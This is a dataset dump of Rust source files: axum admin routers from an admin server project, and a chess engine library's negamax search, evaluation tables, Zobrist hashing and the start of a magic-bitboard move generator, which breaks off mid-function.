repo stringlengths 6 65 | file_url stringlengths 81 311 | file_path stringlengths 6 227 | content stringlengths 0 32.8k | language stringclasses 1
value | license stringclasses 7
values | commit_sha stringlengths 40 40 | retrieved_at stringdate 2026-01-04 15:31:58 2026-01-04 20:25:31 | truncated bool 2
classes |
|---|---|---|---|---|---|---|---|---|
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/router/src/admin/sys_user_route.rs | server/router/src/admin/sys_user_route.rs | use axum::{
http::Method,
routing::{delete, get, post, put},
Router,
};
use server_api::admin::SysUserApi;
use server_global::global::{add_route, RouteInfo};
pub struct SysUserRouter;
impl SysUserRouter {
    /// Build the `/user` admin router and register its route metadata with
    /// the global route registry.
    pub async fn init_user_router() -> Router {
        let base_path = "/user";
        let service_name = "SysUserApi";

        // (path, method, description) triples, registered in declaration order.
        let route_defs = [
            (format!("{}/users", base_path), Method::GET, "获取所有用户"),
            (base_path.to_string(), Method::GET, "获取用户列表"),
            (base_path.to_string(), Method::POST, "创建用户"),
            (format!("{}/:id", base_path), Method::GET, "获取用户详情"),
            (base_path.to_string(), Method::PUT, "更新用户"),
            (format!("{}/:id", base_path), Method::DELETE, "删除用户"),
            (format!("{}/add_policies", base_path), Method::GET, "添加用户策略"),
            (format!("{}/remove_policies", base_path), Method::GET, "删除用户策略"),
        ];
        for (path, method, desc) in route_defs {
            add_route(RouteInfo::new(&path, method, service_name, desc)).await;
        }

        // Axum handlers mounted under the same base path.
        let inner = Router::new()
            .route("/users", get(SysUserApi::get_all_users))
            .route("/", get(SysUserApi::get_paginated_users))
            .route("/", post(SysUserApi::create_user))
            .route("/{id}", get(SysUserApi::get_user))
            .route("/", put(SysUserApi::update_user))
            .route("/{id}", delete(SysUserApi::delete_user))
            .route("/add_policies", get(SysUserApi::add_policies))
            .route("/remove_policies", get(SysUserApi::remove_policies));
        Router::new().nest(base_path, inner)
    }
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/router/src/admin/sys_sandbox_route.rs | server/router/src/admin/sys_sandbox_route.rs | use axum::{routing::get, Router};
use server_api::admin::SysSandboxApi;
pub struct SysSandboxRouter;
impl SysSandboxRouter {
    const BASE_PATH: &str = "/sandbox";

    /// Router exposing the simple API-key test endpoint under `/sandbox`.
    pub async fn init_simple_sandbox_router() -> Router {
        let inner = Router::new().route("/simple-api-key", get(SysSandboxApi::test_simple_api_key));
        Router::new().nest(Self::BASE_PATH, inner)
    }

    /// Router exposing the complex API-key test endpoint under `/sandbox`.
    pub async fn init_complex_sandbox_router() -> Router {
        let inner = Router::new().route("/complex-api-key", get(SysSandboxApi::test_complex_api_key));
        Router::new().nest(Self::BASE_PATH, inner)
    }
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/router/src/admin/sys_menu_route.rs | server/router/src/admin/sys_menu_route.rs | use axum::{
http::Method,
routing::{delete, get, post, put},
Router,
};
use server_api::admin::SysMenuApi;
use server_core::web::operation_log::OperationLogLayer;
use server_global::global::{add_route, RouteInfo};
pub struct SysMenuRouter;
impl SysMenuRouter {
    /// Public router exposing the unauthenticated constant-routes endpoint,
    /// wrapped in the operation-log layer.
    pub async fn init_menu_router() -> Router {
        let inner = Router::new().route(
            "/getConstantRoutes",
            get(SysMenuApi::get_constant_routes).layer(OperationLogLayer::new(true)),
        );
        Router::new().nest("/route", inner)
    }

    /// Protected `/route` router; also registers each endpoint's metadata
    /// with the global route registry.
    pub async fn init_protected_menu_router() -> Router {
        let base_path = "/route";
        let service_name = "SysMenuApi";

        // (path, method, description) triples, registered in declaration order.
        let route_defs = [
            (format!("{}/tree", base_path), Method::GET, "获取菜单树"),
            (base_path.to_string(), Method::GET, "获取菜单列表"),
            (base_path.to_string(), Method::POST, "创建菜单"),
            (format!("{}/:id", base_path), Method::GET, "获取菜单详情"),
            (base_path.to_string(), Method::PUT, "更新菜单"),
            (format!("{}/:id", base_path), Method::DELETE, "删除菜单"),
            (format!("{}/auth-route/:roleId", base_path), Method::GET, "获取角色菜单"),
        ];
        for (path, method, desc) in route_defs {
            add_route(RouteInfo::new(&path, method, service_name, desc)).await;
        }

        let inner = Router::new()
            .route("/tree", get(SysMenuApi::tree_menu))
            .route("/", get(SysMenuApi::get_menu_list))
            .route("/", post(SysMenuApi::create_menu))
            .route("/{id}", get(SysMenuApi::get_menu))
            .route("/", put(SysMenuApi::update_menu))
            .route("/{id}", delete(SysMenuApi::delete_menu))
            .route("/auth-route/{roleId}", get(SysMenuApi::get_auth_routes));
        Router::new().nest(base_path, inner)
    }
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/router/src/admin/sys_access_key_route.rs | server/router/src/admin/sys_access_key_route.rs | use axum::{
http::Method,
routing::{delete, get, post},
Router,
};
use server_api::admin::SysAccessKeyApi;
use server_global::global::{add_route, RouteInfo};
pub struct SysAccessKeyRouter;
impl SysAccessKeyRouter {
    /// Build the `/access-key` admin router and register its route metadata.
    pub async fn init_access_key_router() -> Router {
        let base_path = "/access-key";
        let service_name = "SysAccessKeyApi";

        // (path, method, description) triples, registered in declaration order.
        let route_defs = [
            (base_path.to_string(), Method::GET, "获取访问密钥列表"),
            (base_path.to_string(), Method::POST, "创建访问密钥"),
            (format!("{}/:id", base_path), Method::DELETE, "删除访问密钥"),
        ];
        for (path, method, desc) in route_defs {
            add_route(RouteInfo::new(&path, method, service_name, desc)).await;
        }

        let inner = Router::new()
            .route("/", get(SysAccessKeyApi::get_paginated_access_keys))
            .route("/", post(SysAccessKeyApi::create_access_key))
            .route("/{id}", delete(SysAccessKeyApi::delete_access_key));
        Router::new().nest(base_path, inner)
    }
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/shared/src/lib.rs | server/shared/src/lib.rs | pub fn add(left: usize, right: usize) -> usize {
left + right
}
#[cfg(test)]
mod tests {
    use super::*;

    /// `add` returns the sum of its two operands.
    #[test]
    fn it_works() {
        assert_eq!(add(2, 2), 4);
    }
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/prng.rs | chrs-lib/src/prng.rs | use rand::prelude::*;
use rand_chacha::ChaCha20Rng;
use std::cell::RefCell;
thread_local! {
    // Thread-local ChaCha20 PRNG with a fixed seed, so every run produces the
    // same key sequence (keeps the Zobrist tables below reproducible).
    pub static PRNG: RefCell<ChaCha20Rng> = RefCell::new(ChaCha20Rng::seed_from_u64(234239432));
}
/// Draw the next pseudo-random `u64` from the thread-local, fixed-seed PRNG.
/// Deterministic across runs; used to fill the Zobrist key tables.
pub fn random_u64() -> u64 {
    PRNG.with(|rng| rng.borrow_mut().gen())
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/lib.rs | chrs-lib/src/lib.rs | pub mod ai;
pub mod data;
pub mod generator;
pub mod zobrist;
mod prng;
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/ai/transposition.rs | chrs-lib/src/ai/transposition.rs | use std::collections::HashMap;
use crate::data::Move;
/// Bound classification of a transposition-table score (alpha-beta search).
#[derive(Debug, Default)]
pub enum SearchFlag {
    /// Score fell inside the search window: exact value.
    #[default]
    Exact,
    /// Fail-high: the true score is at least the stored value.
    Lowerbound,
    /// Fail-low: the true score is at most the stored value.
    Upperbound,
}
/// One transposition-table record.
#[derive(Debug, Default)]
pub struct TTEntry {
    /// Remaining search depth this entry was computed with.
    pub depth: usize,
    /// How `value` relates to the true score (exact or a bound).
    pub flag: SearchFlag,
    /// Best move found at this position, if any (seeds PV / move ordering).
    pub best: Option<Move>,
    /// Stored score.
    pub value: i32,
}

/// Transposition table: Zobrist hash -> entry.
pub type TT = HashMap<u64, TTEntry>;
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/ai/negamax.rs | chrs-lib/src/ai/negamax.rs | use super::eval::*;
use super::transposition::{SearchFlag, TT};
use super::{AIStat, AI};
use crate::{
data::{BoardConfig, Move},
generator::MoveGenerator,
};
use instant::Instant;
/// Chess engine: negamax search with alpha-beta pruning, iterative deepening,
/// a transposition table, killer/history move ordering and PV tracking.
pub struct NegaMaxAI {
    /// Maximum iterative-deepening depth of the main search (plies).
    pub depth: usize,
    /// Depth budget of the capture-only quiescence search.
    pub quiescence_depth: usize,
    /// Statistics of the most recent search.
    pub stats: AIStat,
    /// Two killer-move slots per ply (quiet moves that caused beta cutoffs).
    killer_moves: [[Option<Move>; Self::MAX_DEPTH]; 2],
    /// History-heuristic scores indexed by [piece][target square].
    history_moves: [[i32; 64]; 12],
    /// Transposition table keyed by Zobrist hash.
    table: TT,
    /// Length of the principal variation collected at each ply.
    pv_length: [usize; 64],
    /// Triangular PV table: `pv_table[ply]` holds the best line found at that ply.
    pv_table: [[Option<Move>; 64]; 64],
    /// When set, `score_move` gives the previous iteration's PV move top priority.
    score_pv: bool,
    /// When set, the search is still following the previous iteration's PV path.
    follow_pv: bool,
}
impl Default for NegaMaxAI {
    /// 5-ply main search with a 4-ply quiescence extension; all ordering
    /// tables start empty (MAX_DEPTH equals the declared array dimensions).
    fn default() -> Self {
        Self {
            depth: 5,
            quiescence_depth: 4,
            stats: Default::default(),
            killer_moves: [[None; Self::MAX_DEPTH]; 2],
            history_moves: [[0; Self::MAX_DEPTH]; 12],
            table: Default::default(),
            pv_length: [0; Self::MAX_DEPTH],
            pv_table: [[None; Self::MAX_DEPTH]; Self::MAX_DEPTH],
            score_pv: false,
            follow_pv: false,
        }
    }
}
impl NegaMaxAI {
const MIN: i32 = -50000;
const MAX: i32 = 50000;
const MATING_SCORE: i32 = -49000;
const MAX_DEPTH: usize = 64;
pub fn new(depth: usize, qdepth: usize) -> Self {
let mut ai = Self::default();
ai.depth = depth;
ai.quiescence_depth = qdepth;
ai
}
/// Heuristic ordering score for `m` at `ply`:
/// PV move (20000) > captures (MVV-LVA) > killer moves > history score.
fn score_move(&mut self, m: &Move, ply: usize) -> i32 {
    // The previous iteration's PV move is searched first; once it has been
    // scored, stop prioritizing PV moves at deeper plies of this node.
    if self.score_pv && self.pv_table[0][ply] == Some(*m) {
        self.score_pv = false;
        self.follow_pv = true;
        return 20000;
    }
    if m.capture.is_some() {
        score_mvv_lva(m)
    } else if self.killer_moves[0][ply] == Some(*m) {
        9000
    } else if self.killer_moves[1][ply] == Some(*m) {
        8000
    } else {
        self.history_moves[m.p as usize][m.to as usize]
    }
}
/// Negamax search with alpha-beta pruning, transposition table and
/// principal-variation (PV) tracking.
///
/// `alpha`/`beta` form the current search window, `depth` is the remaining
/// search depth and `ply` the distance from the root (indexes the killer,
/// history and PV tables).
fn nega_max(
    &mut self,
    config: &mut BoardConfig,
    gen: &MoveGenerator,
    mut alpha: i32,
    mut beta: i32,
    depth: usize,
    ply: usize,
) -> i32 {
    self.stats.node_count += 1;
    self.stats.max_depth = usize::max(self.stats.max_depth, depth);
    // Default: this node's PV is empty (length == ply).
    self.pv_length[ply] = ply;
    // Remember the window's lower bound to classify the TT entry on store.
    let alpha_orig = alpha;

    // Transposition-table probe: reuse a stored result if it was searched
    // at least as deep as required here.
    if let Some(entry) = self.table.get(&config.get_hash()) {
        if entry.depth >= depth {
            match entry.flag {
                SearchFlag::Exact => {
                    // Exact score: adopt the stored best move into the PV
                    // and splice in the child PV, then cut off.
                    self.pv_table[ply][ply] = entry.best;
                    for next_ply in (ply + 1)..self.pv_length[ply + 1] {
                        self.pv_table[ply][next_ply] = self.pv_table[ply + 1][next_ply];
                    }
                    self.pv_length[ply] = self.pv_length[ply + 1];
                    return entry.value;
                }
                // Bound entries only tighten the window.
                SearchFlag::Lowerbound => alpha = i32::max(alpha, entry.value),
                SearchFlag::Upperbound => beta = i32::min(beta, entry.value),
            };
        }
        // Window collapsed after tightening: cutoff with the stored value.
        if alpha >= beta {
            return entry.value;
        }
    }
    // Horizon reached: resolve tactics with a capture-only quiescence search.
    if depth == 0 {
        return self.quiescence(config, gen, alpha, beta, self.quiescence_depth, ply + 1);
    }
    // Hard ply cap — the killer/PV tables only have MAX_DEPTH slots.
    // NOTE(review): negamax expects a side-to-move-relative score here, but
    // `evaluate` (eval.rs) looks white-relative — verify the convention.
    if ply > Self::MAX_DEPTH - 1 {
        return evaluate(config);
    }

    let in_check = config.is_king_in_check(gen, config.get_active_color());
    let mut value = Self::MIN;
    let mut moves = gen.gen_all_moves(config.get_active_color(), config, false);

    // PV-following: keep prioritizing the previous iteration's PV move only
    // while it is still playable from this node.
    if self.follow_pv {
        if moves.iter().any(|m| self.pv_table[0][ply] == Some(*m)) {
            self.score_pv = true;
            self.follow_pv = true;
        } else {
            self.follow_pv = false;
        }
    }
    // Search better-looking moves first to maximize alpha-beta cutoffs.
    moves.sort_by(|a, b| self.score_move(b, ply).cmp(&self.score_move(a, ply)));

    for m in moves.iter() {
        // make_move may refuse the move (returns None); skip it in that case.
        if let Some(commit) = config.make_move(*m) {
            value = i32::max(
                value,
                -self.nega_max(config, gen, -beta, -alpha, depth - 1, ply + 1),
            );
            config.undo_commit(&commit);
            if value >= beta {
                // Beta cutoff: remember quiet refutations as killer moves.
                if m.capture.is_none() {
                    self.killer_moves[1][ply] = self.killer_moves[0][ply];
                    self.killer_moves[0][ply] = Some(*m);
                }
                break;
            }
            if value > alpha {
                alpha = value;
                // New best line: record the move and splice in the child PV.
                self.pv_table[ply][ply] = Some(*m);
                for next_ply in (ply + 1)..self.pv_length[ply + 1] {
                    self.pv_table[ply][next_ply] = self.pv_table[ply + 1][next_ply];
                }
                self.pv_length[ply] = self.pv_length[ply + 1];
                // History heuristic: reward quiet moves that raise alpha.
                if m.capture.is_none() {
                    self.history_moves[m.p as usize][m.to as usize] += (depth * depth) as i32;
                }
            }
        }
    }

    // No moves at all: checkmate (prefer faster mates via `+ ply`) or stalemate.
    if moves.len() == 0 {
        if in_check {
            return Self::MATING_SCORE + ply as i32;
        } else {
            return 0;
        }
    }

    // Store the result, classified against the original window
    // (fail-low => upper bound, fail-high => lower bound).
    let entry = self
        .table
        .entry(config.get_hash())
        .or_insert(Default::default());
    entry.value = value;
    if value <= alpha_orig {
        entry.flag = SearchFlag::Upperbound;
    } else if value >= beta {
        entry.flag = SearchFlag::Lowerbound;
    } else {
        entry.flag = SearchFlag::Exact;
    }
    entry.best = self.pv_table[ply][ply];
    entry.depth = depth;
    value
}
/// Quiescence search: extend the search through capture sequences only, so
/// the horizon evaluation is not taken in the middle of an exchange.
fn quiescence(
    &mut self,
    config: &mut BoardConfig,
    gen: &MoveGenerator,
    mut alpha: i32,
    beta: i32,
    depth: usize,
    ply: usize,
) -> i32 {
    self.stats.node_count += 1;
    self.stats.max_depth = usize::max(self.stats.max_depth, depth);
    // Stand-pat score: the side to move may decline all captures.
    let eval = evaluate(config);
    if depth == 0 {
        return eval;
    }
    // Fail-hard beta cutoff on the stand-pat score.
    if eval >= beta {
        return beta;
    }
    alpha = i32::max(alpha, eval);
    // Captures only (`only_captures = true`), ordered like the main search.
    let mut moves = gen.gen_all_moves(config.get_active_color(), config, true);
    moves.sort_by(|a, b| self.score_move(b, ply).cmp(&self.score_move(a, ply)));
    for m in moves.iter() {
        assert!(m.capture.is_some());
        if let Some(commit) = config.make_move(*m) {
            let score = -self.quiescence(config, gen, -beta, -alpha, depth - 1, ply + 1);
            config.undo_commit(&commit);
            if score >= beta {
                return beta;
            }
            alpha = i32::max(alpha, score);
        }
    }
    alpha
}
}
impl AI for NegaMaxAI {
    /// Run iterative deepening up to `self.depth` and return the best root
    /// move (the head of the final principal variation).
    fn get_best_move(&mut self, config: &BoardConfig, gen: &MoveGenerator) -> Option<Move> {
        // Reset per-search state. Ply-indexed tables use Self::MAX_DEPTH
        // (previously hard-coded 64s); the history table's 64 is the number
        // of target squares, so that literal is kept.
        self.stats = Default::default();
        self.history_moves = [[0; 64]; 12];
        self.killer_moves = [[None; Self::MAX_DEPTH]; 2];
        self.pv_length = [0; Self::MAX_DEPTH];
        self.pv_table = [[None; Self::MAX_DEPTH]; Self::MAX_DEPTH];
        self.score_pv = false;
        self.follow_pv = false;

        let mut config = config.clone();
        let now = Instant::now();
        // Iterative deepening: each iteration seeds move ordering (PV,
        // history) for the next, so depths are searched in ascending order.
        for current_depth in 1..=self.depth {
            self.follow_pv = true;
            self.stats.node_count = 0;
            self.nega_max(&mut config, gen, Self::MIN, Self::MAX, current_depth, 0);
        }
        self.stats.time = now.elapsed();
        self.pv_table[0][0]
    }

    /// Statistics of the most recent `get_best_move` call.
    fn get_stats(&self) -> AIStat {
        self.stats
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/ai/mod.rs | chrs-lib/src/ai/mod.rs | mod eval;
mod negamax;
mod transposition;
use crate::data::{BoardConfig, Move};
use crate::generator::MoveGenerator;
pub use negamax::NegaMaxAI;
use std::time::Duration;
/// Interface implemented by chess engines.
pub trait AI {
    /// Search `config` and return the engine's chosen move, if any exists.
    fn get_best_move(&mut self, config: &BoardConfig, gen: &MoveGenerator) -> Option<Move>;
    /// Statistics gathered during the most recent search.
    fn get_stats(&self) -> AIStat;
}
/// Search statistics reported by an `AI` implementation.
#[derive(Default, Copy, Clone, Debug)]
pub struct AIStat {
    /// Number of nodes visited.
    pub node_count: usize,
    /// Wall-clock duration of the search.
    pub time: Duration,
    /// Largest remaining-depth value observed during the search.
    pub max_depth: usize,
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/ai/eval.rs | chrs-lib/src/ai/eval.rs | use crate::data::{BoardConfig, BoardPiece, Color, Move, Square};
use strum::IntoEnumIterator;
const MATERIAL_SCORE: [i32; 12] = [
100, 300, 350, 500, 1000, 10000, -100, -300, -350, -500, -1000, -10000,
];
#[rustfmt::skip]
const PAWN_SCORE: [i32; 64] =
[
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, -10, -10, 0, 0, 0,
0, 0, 0, 5, 5, 0, 0, 0,
5, 5, 10, 20, 20, 5, 5, 5,
10, 10, 10, 20, 20, 10, 10, 10,
20, 20, 20, 30, 30, 30, 20, 20,
30, 30, 30, 40, 40, 30, 30, 30,
90, 90, 90, 90, 90, 90, 90, 90
];
// knight positional score
#[rustfmt::skip]
const KNIGHT_SCORE: [i32; 64] =
[
-5, -10, 0, 0, 0, 0, -10, -5,
-5, 0, 0, 0, 0, 0, 0, -5,
-5, 5, 20, 10, 10, 20, 5, -5,
-5, 10, 20, 30, 30, 20, 10, -5,
-5, 10, 20, 30, 30, 20, 10, -5,
-5, 5, 20, 20, 20, 20, 5, -5,
-5, 0, 0, 10, 10, 0, 0, -5,
-5, 0, 0, 0, 0, 0, 0, -5
];
// bishop positional score
#[rustfmt::skip]
const BISHOP_SCORE: [i32; 64] =
[
0, 0, -10, 0, 0, -10, 0, 0,
0, 30, 0, 0, 0, 0, 30, 0,
0, 10, 0, 0, 0, 0, 10, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 0, 10, 10, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0
];
// rook positional score
#[rustfmt::skip]
const ROOK_SCORE: [i32; 64] =
[
0, 0, 0, 20, 20, 0, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
50, 50, 50, 50, 50, 50, 50, 50,
50, 50, 50, 50, 50, 50, 50, 50
];
// king positional score
#[rustfmt::skip]
const KING_SCORE: [i32; 64] =
[
0, 0, 5, 0, -15, 0, 10, 0,
0, 5, 5, -5, -5, 0, 5, 0,
0, 0, 5, 10, 10, 5, 0, 0,
0, 5, 10, 20, 20, 10, 5, 0,
0, 5, 10, 20, 20, 10, 5, 0,
0, 5, 5, 10, 10, 5, 5, 0,
0, 0, 5, 5, 5, 5, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0
];
/// Piece-square bonus for a pawn; Black indexes the mirrored square.
const fn get_pawn_score(sq: Square, c: Color) -> i32 {
    match c {
        Color::White => PAWN_SCORE[sq as usize],
        Color::Black => PAWN_SCORE[sq.mirror() as usize],
    }
}

/// Piece-square bonus for a knight; Black indexes the mirrored square.
const fn get_knight_score(sq: Square, c: Color) -> i32 {
    match c {
        Color::White => KNIGHT_SCORE[sq as usize],
        Color::Black => KNIGHT_SCORE[sq.mirror() as usize],
    }
}

/// Piece-square bonus for a bishop; Black indexes the mirrored square.
const fn get_bishop_score(sq: Square, c: Color) -> i32 {
    match c {
        Color::White => BISHOP_SCORE[sq as usize],
        Color::Black => BISHOP_SCORE[sq.mirror() as usize],
    }
}

/// Piece-square bonus for a rook; Black indexes the mirrored square.
const fn get_rook_score(sq: Square, c: Color) -> i32 {
    match c {
        Color::White => ROOK_SCORE[sq as usize],
        Color::Black => ROOK_SCORE[sq.mirror() as usize],
    }
}

/// Piece-square bonus for a king; Black indexes the mirrored square.
const fn get_king_score(sq: Square, c: Color) -> i32 {
    match c {
        Color::White => KING_SCORE[sq as usize],
        Color::Black => KING_SCORE[sq.mirror() as usize],
    }
}
/// Static evaluation: material plus piece-square bonuses summed over every
/// piece. Positive favors White (Black material constants are negative and
/// Black positional bonuses are subtracted).
pub fn evaluate(config: &BoardConfig) -> i32 {
    let mut score = 0;
    use BoardPiece::*;
    for p in BoardPiece::iter() {
        // Walk every set bit (piece location) of this piece's bitboard.
        let mut bb = config.bitboards[p as usize];
        while *bb > 0 {
            let pos = bb.pop_sq().unwrap();
            let mat_score = MATERIAL_SCORE[p as usize];
            let pos_score = match p {
                WhiteKing | BlackKing => get_king_score(pos, p.get_color()),
                WhitePawn | BlackPawn => get_pawn_score(pos, p.get_color()),
                WhiteRook | BlackRook => get_rook_score(pos, p.get_color()),
                // Queens currently receive no positional bonus.
                WhiteQueen | BlackQueen => 0,
                WhiteBishop | BlackBishop => get_bishop_score(pos, p.get_color()),
                WhiteKnight | BlackKnight => get_knight_score(pos, p.get_color()),
            };
            score += match p.get_color() {
                Color::White => mat_score + pos_score,
                Color::Black => mat_score - pos_score,
            }
        }
    }
    score
}
#[rustfmt::skip]
const MVV_LVA: [[i32; 12]; 12] = [
[105, 205, 305, 405, 505, 605, 105, 205, 305, 405, 505, 605],
[104, 204, 304, 404, 504, 604, 104, 204, 304, 404, 504, 604],
[103, 203, 303, 403, 503, 603, 103, 203, 303, 403, 503, 603],
[102, 202, 302, 402, 502, 602, 102, 202, 302, 402, 502, 602],
[101, 201, 301, 401, 501, 601, 101, 201, 301, 401, 501, 601],
[100, 200, 300, 400, 500, 600, 100, 200, 300, 400, 500, 600],
[105, 205, 305, 405, 505, 605, 105, 205, 305, 405, 505, 605],
[104, 204, 304, 404, 504, 604, 104, 204, 304, 404, 504, 604],
[103, 203, 303, 403, 503, 603, 103, 203, 303, 403, 503, 603],
[102, 202, 302, 402, 502, 602, 102, 202, 302, 402, 502, 602],
[101, 201, 301, 401, 501, 601, 101, 201, 301, 401, 501, 601],
[100, 200, 300, 400, 500, 600, 100, 200, 300, 400, 500, 600],
];
/// MVV-LVA (most-valuable-victim / least-valuable-attacker) score for a
/// capture, used for move ordering. Returns 0 for non-captures.
pub fn score_mvv_lva(m: &Move) -> i32 {
    // `match` replaces the is_none()-then-unwrap() pattern.
    match m.capture {
        Some(victim) => MVV_LVA[m.p as usize][victim as usize],
        None => 0,
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/zobrist/mod.rs | chrs-lib/src/zobrist/mod.rs | use crate::data::{BoardConfig, BoardPiece, Color, Square};
use crate::prng::*;
use lazy_static::lazy_static;
lazy_static! {
    /// Zobrist key for every (square, piece) pair.
    pub static ref PIECE_KEYS: [[u64; 12]; 64] = {
        let mut t = [[0; 12]; 64];
        let mut i = 0;
        while i < 64 {
            let mut p = 0;
            while p < 12 {
                t[i][p] = random_u64();
                p += 1;
            }
            i += 1;
        }
        t
    };
    /// Zobrist key per possible en-passant target square.
    pub static ref EP_KEYS: [u64; 64] = {
        let mut t = [0; 64];
        let mut i = 0;
        while i < 64 {
            t[i] = random_u64();
            i += 1;
        }
        t
    };
    /// Zobrist key per castling-rights bitmask (4 flag bits -> 16 states).
    pub static ref CASTLE_KEYS: [u64; 16] = {
        let mut t = [0; 16];
        let mut i = 0;
        while i < 16 {
            t[i] = random_u64();
            i += 1;
        }
        t
    };
    /// Key XORed into the hash when Black is to move.
    pub static ref BLACK_TO_MOVE: u64 = random_u64();
}
/// Compute the full Zobrist hash of `config` from scratch: piece placement,
/// en-passant target, castling rights and side to move.
pub fn hash(config: &BoardConfig) -> u64 {
    let mut key: u64 = 0;
    for i in 0..64 {
        if let Some(p) = config.get_at_sq(Square::try_from(i).unwrap()) {
            key ^= PIECE_KEYS[i][p as usize];
        }
    }
    if let Some(t) = config.get_en_passant_target() {
        key ^= EP_KEYS[t as usize];
    }
    key ^= CASTLE_KEYS[config.get_castle_flags_raw() as usize];
    if config.get_active_color() == Color::Black {
        key ^= *BLACK_TO_MOVE;
    }
    key
}
/// Toggle piece `p` on square `sq` in `key` (XOR is its own inverse, so the
/// same call both adds and removes a piece).
pub fn update_piece(sq: Square, p: BoardPiece, key: &mut u64) {
    *key ^= PIECE_KEYS[sq as usize][p as usize];
}

/// Toggle the en-passant-target key for `sq`.
pub fn update_ep(sq: Square, key: &mut u64) {
    *key ^= EP_KEYS[sq as usize];
}

/// Toggle the castling-rights key for raw flag bits `c`.
pub fn update_castle(c: u8, key: &mut u64) {
    *key ^= CASTLE_KEYS[c as usize];
}

/// Toggle the side-to-move key — but only when `side` is White.
/// NOTE(review): the calling convention is not visible here; confirm it
/// stays consistent with `hash()`, which XORs BLACK_TO_MOVE exactly when
/// Black is the active color.
pub fn update_side(side: Color, key: &mut u64) {
    if side == Color::White {
        *key ^= *BLACK_TO_MOVE;
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/generator/mod.rs | chrs-lib/src/generator/mod.rs | pub mod tables;
use crate::data::{
BitBoard, BoardConfig, BoardPiece, Color, Move, MoveList, MoveType, Square, B_PIECES, W_PIECES,
};
use tables::*;
/// Move generator backed by precomputed magic-bitboard tables for sliders.
pub struct MoveGenerator {
    /// Per-square magic hashing parameters for rooks.
    rook_magics: [MagicEntry; 64],
    /// Per-square magic hashing parameters for bishops.
    bishop_magics: [MagicEntry; 64],
    /// Shared rook move table, addressed via `magic_index`.
    rook_moves: Vec<BitBoard>,
    /// Shared bishop move table, addressed via `magic_index`.
    bishop_moves: Vec<BitBoard>,
}
impl Default for MoveGenerator {
    /// Build the magic-bitboard lookup tables for every square.
    ///
    /// For each of the 64 squares a magic entry is found for both slider
    /// types; the per-square move tables are appended to one shared `Vec`
    /// and addressed later through `MagicEntry::offset`.
    fn default() -> Self {
        let mut rook_magics = [MagicEntry::default(); 64];
        let mut bishop_magics = [MagicEntry::default(); 64];
        let mut rook_moves: Vec<BitBoard> = vec![];
        let mut bishop_moves: Vec<BitBoard> = vec![];
        log::info!("Generating Magic Entries");
        for i in 0..64 {
            let (mut bishop_magic, mut bishop_move_tbl) = find_magic(i, BoardPiece::WhiteBishop);
            // The offset is only known once this square's slice position in
            // the shared table is fixed.
            bishop_magic.offset = bishop_moves.len();
            bishop_magics[i] = bishop_magic;
            bishop_moves.append(&mut bishop_move_tbl);
            log::trace!(
                "Bishop Magic Entry for square {i}\nMagic: {:?}",
                bishop_magic
            );
